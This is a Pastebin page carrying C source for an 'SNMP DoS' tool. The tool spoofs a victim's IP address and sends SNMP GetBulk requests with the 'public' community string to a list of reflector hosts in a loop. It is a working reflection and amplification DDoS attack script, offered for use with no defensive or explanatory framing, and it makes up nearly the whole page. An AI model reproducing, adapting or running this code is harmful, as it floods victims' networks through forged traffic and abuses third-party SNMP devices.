API tools faq
paste
Advertisement
KhaosBringer

SNMP Attack Script Source

KhaosBringer
Apr 13th, 2015
1,186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 5.59 KB | None | 0 0
raw download clone embed print report
  1. /*
  2.    
  3.     SNMP DDoS
  4.  
  5. */
  6.  
  7. #include        <stdio.h>
  8. #include        <string.h>
  9. #include        <unistd.h>
  10. #include        <stdlib.h>
  11. #include        <netinet/in_systm.h>
  12.  
  13. #include        <sys/types.h>
  14. #include        <sys/socket.h>
  15. #include        <netinet/in.h>
  16. #include        <arpa/inet.h>
  17. #include        <netinet/ip.h>
  18. #include        <netinet/udp.h>
  19.  
  20.  
  21.  
  22. #include <sys/types.h>
  23. #include <sys/socket.h>
  24. #include <netinet/in.h>
  25. #include <arpa/inet.h>
  26.    
  27.  
  28. struct sockaddr_in dest;
  29.  
  30. int sok,i=0, count=0, loop=0, lcount=0;
  31.  
  32. char *source, *filename;
  33. char c;
  34.  
  35. FILE *hostfile;
  36. char buf[32];
  37. u_long address[2048];
  38. int num = 0, n;
  39.  
  40. char snmpkill[] =
  41. "\x30\x24\x02\x01\x01\x04\x06\x70\x75\x62\x6c\x69\x63\xa5\x17\x02"
  42. "\x04\x7b\x73\xcc\x13\x02\x01\x00\x02\x01\x64\x30\x09\x30\x07\x06"
  43. "\x03\x2b\x06\x01\x05";
  44.  
  45.  
  46.  
  47.  
  48. in_cksum (unsigned short *ptr, int nbytes)
  49. {
  50.  
  51.   register long sum;        /* assumes long == 32 bits */
  52.   u_short oddbyte;
  53.   register u_short answer;  /* assumes u_short == 16 bits */
  54.  
  55.   /*
  56.    * Our algorithm is simple, using a 32-bit accumulator (sum),
  57.    * we add sequential 16-bit words to it, and at the end, fold back
  58.    * all the carry bits from the top 16 bits into the lower 16 bits.
  59.    */
  60.  
  61.   sum = 0;
  62.   while (nbytes > 1)
  63.     {
  64.       sum += *ptr++;
  65.       nbytes -= 2;
  66.     }
  67.  
  68.   /* mop up an odd byte, if necessary */
  69.   if (nbytes == 1)
  70.     {
  71.       oddbyte = 0;      /* make sure top half is zero */
  72.       *((u_char *) & oddbyte) = *(u_char *) ptr;    /* one byte only */
  73.       sum += oddbyte;
  74.     }
  75.  
  76.   /*
  77.    * Add back carry outs from top 16 bits to low 16 bits.
  78.    */
  79.  
  80.   sum = (sum >> 16) + (sum & 0xffff);   /* add high-16 to low-16 */
  81.   sum += (sum >> 16);       /* add carry */
  82.   answer = ~sum;        /* ones-complement, then truncate to 16 bits */
  83.   return (answer);
  84. }
  85.  
  86.  
  87. void usage (void)
  88. {
  89. printf("SNMP DoS v1.0\n");
  90. printf("Usage: snmpdos  [-t target ip_addr] [-f host file] [-l loop count] \n");
  91. }
  92.  
  93.  
  94.  
  95.  
  96.  
  97. void loadfile (void)
  98. {
  99.     if ((hostfile = fopen(filename, "r")) == NULL)
  100.      {
  101.         perror("Opening hostfile");
  102.         exit(-1);
  103.      }
  104.  
  105.     while (fgets(buf, sizeof buf, hostfile) != NULL)
  106.     {
  107.         char *p;
  108.         int valid;
  109.  
  110.         /* skip over comments/blank lines */
  111.         if (buf[0] == '#' || buf[0] == '\n') continue;
  112.  
  113.         /* get rid of newline */
  114.         buf[strlen(buf) - 1] = '\0';
  115.  
  116.         /* check for valid address */
  117.         for (p = buf, valid = 1; *p != '\0'; p++)
  118.         {
  119.             if ( ! isdigit(*p) && *p != '.' )
  120.             {
  121.                 fprintf(stderr, "Skipping invalid ip %s\n", buf);
  122.                 valid = 0;
  123.                 break;
  124.             }
  125.         }
  126.  
  127.         /* if valid address, copy to our array */
  128.         if (valid)
  129.         {
  130.             address[num] = inet_addr(buf);
  131.             num++;
  132.             if (num == 2048)
  133.                 break;
  134.         }
  135.     }
  136.  
  137. }
  138.  
  139.  
  140.  
  141.  
  142. int sendit(ulong destaddr)
  143. {
  144.  
  145. struct pseudoudp {
  146. u_long ipsource;
  147. u_long ipdest;
  148. char zero;
  149. char proto;
  150. u_short length;
  151. } *psudp;
  152.  
  153. struct in_addr sourceip_addr;
  154. struct in_addr destip_addr;
  155. struct ip          *IP;
  156. struct udphdr      *UDP;
  157. char *packet, *packetck, *data;
  158. int datasize;
  159.  
  160.  
  161. destip_addr.s_addr=destaddr;
  162. sourceip_addr.s_addr=inet_addr(source);
  163. dest.sin_addr.s_addr=destip_addr.s_addr;                                                                        
  164.  
  165. datasize=sizeof(snmpkill);
  166.  
  167. packet = ( char * )malloc( 20 + 8 + datasize );
  168.  
  169. IP     = (struct ip     *)packet;
  170.  
  171. memset(packet,0,sizeof(packet));
  172.        
  173.         IP->ip_dst.s_addr  = destip_addr.s_addr;
  174.         IP->ip_src.s_addr  = sourceip_addr.s_addr;
  175.         IP->ip_v = 4;
  176.         IP->ip_hl = 5;
  177.         IP->ip_ttl = 245;
  178.         IP->ip_id = htons(1047);
  179.         IP->ip_p = 17;
  180.         IP->ip_len  = htons(20 + 8 + datasize);
  181.         IP->ip_sum  = in_cksum((u_short *)packet,20);
  182.  
  183.  
  184. UDP   = (struct udphdr    *)(packet+20);
  185.       UDP->source = htons(161);
  186.       UDP->dest   = htons(161);
  187.       UDP->len     = htons(8+datasize);
  188.       UDP->check = 0;
  189.       packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));
  190.       bzero(packetck,8 + datasize + sizeof(struct pseudoudp));    
  191.       psudp = (struct pseudoudp *) (packetck);
  192.       psudp->ipdest = destip_addr.s_addr;
  193.       psudp->ipsource = sourceip_addr.s_addr;
  194.       psudp->zero = 0;
  195.       psudp->proto = 17;
  196.       psudp->length = htons(8+datasize);
  197.       memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);
  198.       memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);
  199.  
  200.       UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));    
  201.  
  202. data   = (unsigned char    *)(packet+20+8);
  203. memcpy(data,snmpkill,datasize);  
  204.                                                                                                      
  205.  
  206. return(sendto(sok,packet,20+8+datasize,0,(struct sockaddr *) &dest,sizeof(struct sockaddr)));
  207.  
  208. free(packet);
  209. free(packetck);
  210. }
  211.  
  212.  
  213.  
  214. int main(int argc,char **argv){
  215.  
  216. if(argc < 3) {
  217.     usage();
  218.     return 0;
  219. }
  220.  
  221. while((c=getopt(argc,argv,"t:f:l:"))!=EOF){
  222.         switch(c) {
  223.          case 't': source=optarg; break;
  224.      case 'f': filename=optarg; break;
  225.      case 'l': loop=atoi(optarg); break;
  226.      default: usage();
  227.          }
  228. }
  229.  
  230. loadfile();
  231.  
  232.  
  233. dest.sin_family=AF_INET;
  234.  
  235. if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
  236. {
  237.         printf("Can't create socket.\n");
  238.         exit(EXIT_FAILURE);
  239. }
  240.  
  241. n=0;
  242.  
  243.  
  244. while(lcount < loop){
  245.  
  246. while(n < num)
  247. {
  248.     if(sendit(address[n]) == -1) printf ("SENDING ERROR!\n");
  249.     n++;
  250.     count++;
  251. }
  252.  
  253. if(n == num){ n = 0; lcount++;}
  254.  
  255. }
  256.  
  257.  
  258.  
  259.  
  260. printf("%i packets sent\n", count);
  261.  
  262. return 0;
  263. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!